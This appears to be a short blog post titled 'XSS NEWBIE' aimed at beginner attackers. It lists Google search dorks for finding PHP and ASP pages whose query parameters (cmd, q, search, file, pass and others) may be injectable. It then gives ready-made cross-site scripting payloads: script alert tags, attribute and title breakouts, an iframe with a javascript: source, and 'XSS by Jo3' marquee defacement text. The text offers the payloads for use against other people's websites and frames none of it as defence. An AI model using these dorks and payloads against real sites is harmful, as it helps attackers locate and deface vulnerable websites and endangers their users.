XSS NEWBIE
DORK :
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
java script :
!--" /><script>alert('xss');</script>
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by Jo3</h1></marquee>
"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by Jo3</h1></marquee>
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by Jo3</h1></marquee>
<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by Jo3</h1></marquee>
<script>alert(1337)</script><marquee><h1>XSS by Jo3</h1></marquee>
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
<iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by Jo3</h1></marquee>
No comments: